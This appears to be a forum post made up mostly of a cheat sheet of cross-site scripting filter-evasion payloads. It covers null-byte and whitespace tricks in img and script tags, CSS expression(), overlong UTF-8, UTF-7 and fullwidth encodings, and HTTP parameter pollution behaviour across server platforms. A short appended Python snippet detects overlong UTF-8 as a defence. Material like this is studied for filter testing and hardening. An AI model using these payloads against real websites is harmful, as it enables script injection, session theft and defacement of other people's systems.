test22

Started by Deleted user
Followed by: @"George stagethree"

Deleted user

<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror/=alert(0) />
<img src='1' onerror\x0b=alert(0) />
<img src='1' onerror=\x00alert(0) />
<img src='1' o\x00nerr\x00or=alert(0) />
<\x00img src='1' onerror=alert(0) />
<script\x00>alert(1)</script>
<i\x00mg src='1' onerror=alert(0) />
<img/src='1'/onerror=alert(0)>
<img\x0bsrc='1'\x0bonerror=alert(0)>
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">
<img src='1'\x00onerror=alert(0)>
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)

<img src='1' onerror='alert(0)' <
«script>alert(0)</script>

body{background-color:expression\(alert(1))}



Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2


%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE


+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

<img src=1 alt=al lang=ert onerror=topalt+lang>
';</script>

body { background-image:url('http://www.blah.com/

'); }</style>
<?xml version="1.0" ?>

(IE)

(Firefox, Chrome, Safari)

(Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

(Firefox)

http://target.com/something.jsp?inject=#alert(1)
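For the overlong UTF-8 table in the post above, a server-side check that flags non-canonical sequences before any filter or lenient decoder sees the value. This is an added example, not part of the original post; `find_overlong` and `screen_param` are hypothetical names, and the benign sample value is constructed.

```python
from urllib.parse import unquote_to_bytes

# (lead-byte mask, lead-byte pattern, sequence length, smallest code point
# that legitimately needs that length)
_FORMS = ((0xE0, 0xC0, 2, 0x80), (0xF0, 0xE0, 3, 0x800), (0xF8, 0xF0, 4, 0x10000))

def find_overlong(raw: bytes):
    """Return (offset, sequence, aliased char) for each overlong UTF-8 form."""
    hits, i = [], 0
    while i < len(raw):
        step = 1
        for mask, pattern, length, minimum in _FORMS:
            seq = raw[i:i + length]
            if raw[i] & mask != pattern or len(seq) < length:
                continue
            if any(b & 0xC0 != 0x80 for b in seq[1:]):
                continue  # malformed continuation bytes, not an overlong form
            cp = seq[0] & ~mask & 0xFF          # payload bits of the lead byte
            for b in seq[1:]:
                cp = (cp << 6) | (b & 0x3F)     # six payload bits per continuation
            if cp < minimum:                    # a shorter encoding exists
                hits.append((i, seq, chr(cp)))
            step = length
            break
        i += step
    return hits

def screen_param(value: str):
    """Percent-decode a raw query value and refuse non-canonical UTF-8."""
    raw = unquote_to_bytes(value)
    hits = find_overlong(raw)
    if hits:
        return {"ok": False, "reason": "overlong UTF-8", "hits": hits}
    try:
        return {"ok": True, "text": raw.decode("utf-8", errors="strict")}
    except UnicodeDecodeError as exc:
        return {"ok": False, "reason": f"invalid UTF-8: {exc.reason}", "hits": []}

if __name__ == "__main__":
    # First value: the 2-byte rows of the post's table. Second: constructed benign input.
    for sample in ("%C0%BC%C0%BE%C0%A7%C0%A2", "caf%C3%A9"):
        print(sample, "->", screen_param(sample))
```

Python's strict decoder already rejects these bytes; the explicit scan adds the offset and the ASCII character each sequence aliases, which is what a log entry or WAF rule needs.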
